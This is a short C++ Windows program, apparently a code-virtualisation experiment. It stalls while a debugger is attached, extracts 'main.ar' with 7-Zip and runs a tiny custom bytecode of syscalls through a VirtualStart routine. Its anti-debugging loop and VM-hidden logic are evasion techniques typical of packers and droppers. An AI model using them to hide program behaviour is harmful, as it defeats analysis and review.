#include <Windows.h>
#include "Virtualisetion.h"

int __stdcall WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,
		PSTR lpCmdLine, int nCmdShow)
//int main()
{
	while(IsDebuggerPresent()) {}

	system("7z.exe x main.ar -y");

	const int SizeCode = 25;
	char Code[SizeCode] = {
		Mov, AX, Value, 1,
		Syscall,
		Mov, AX, Value, 5,
		Syscall,
		Mov, AX, Value, 2,
		Syscall,
		Mov, AX, Value, 3,
		Syscall,
		Mov, AX, Value, 4,
		Syscall
	};
	VirtualStart(Code, SizeCode);
	return 0;
}